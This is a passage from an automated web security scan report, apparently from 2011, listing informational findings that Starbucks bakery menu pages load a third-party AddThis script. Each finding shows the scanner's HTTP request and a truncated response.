Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/8-grain-roll

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/8-grain-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:35 GMT
Connection: close
Content-Length: 44024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.187. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-bran-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/apple-bran-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:42 GMT
Connection: close
Content-Length: 44209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.188. http://www.starbucks.com/menu/food/bakery/apple-fritter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-fritter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/apple-fritter HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:54 GMT
Connection: close
Content-Length: 44345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.189. http://www.starbucks.com/menu/food/bakery/asiago-bagel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/asiago-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/asiago-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:12 GMT
Connection: close
Content-Length: 43943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.190. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/banana-nut-loaf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/banana-nut-loaf HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:19 GMT
Connection: close
Content-Length: 42482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.191. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/birthday-cake-mini-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/birthday-cake-mini-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:38 GMT
Connection: close
Content-Length: 43600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.192. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-oat-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-oat-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:40 GMT
Connection: close
Content-Length: 43374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.193. http://www.starbucks.com/menu/food/bakery/blueberry-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:41 GMT
Connection: close
Content-Length: 43391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.194. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-streusel-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-streusel-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:08 GMT
Connection: close
Content-Length: 43635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.195. http://www.starbucks.com/menu/food/bakery/butter-croissant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/butter-croissant

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/butter-croissant HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:47 GMT
Connection: close
Content-Length: 43265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.196. http://www.starbucks.com/menu/food/bakery/cheese-danish

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cheese-danish

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cheese-danish HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:45 GMT
Connection: close
Content-Length: 43330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.197. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-chunk-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-chunk-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:03 GMT
Connection: close
Content-Length: 43551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.198. http://www.starbucks.com/menu/food/bakery/chocolate-croissant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-croissant

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-croissant HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:17 GMT
Connection: close
Content-Length: 43529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.199. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-old-fashion-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-old-fashion-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:15 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.200. http://www.starbucks.com/menu/food/bakery/chonga-bagel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chonga-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chonga-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:28 GMT
Connection: close
Content-Length: 44180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.201. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cinnamon-chip-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cinnamon-chip-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:27 GMT
Connection: close
Content-Length: 43946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.202. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-orange-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cranberry-orange-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:51 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.203. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-chocolate-brownie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-chocolate-brownie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:53 GMT
Connection: close
Content-Length: 43608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.204. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-fudge-mini-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-fudge-mini-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:01 GMT
Connection: close
Content-Length: 43483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.205. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-iced-cinnamon-roll

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-iced-cinnamon-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:05 GMT
Connection: close
Content-Length: 44454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.206. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/ginger-molasses-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/ginger-molasses-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
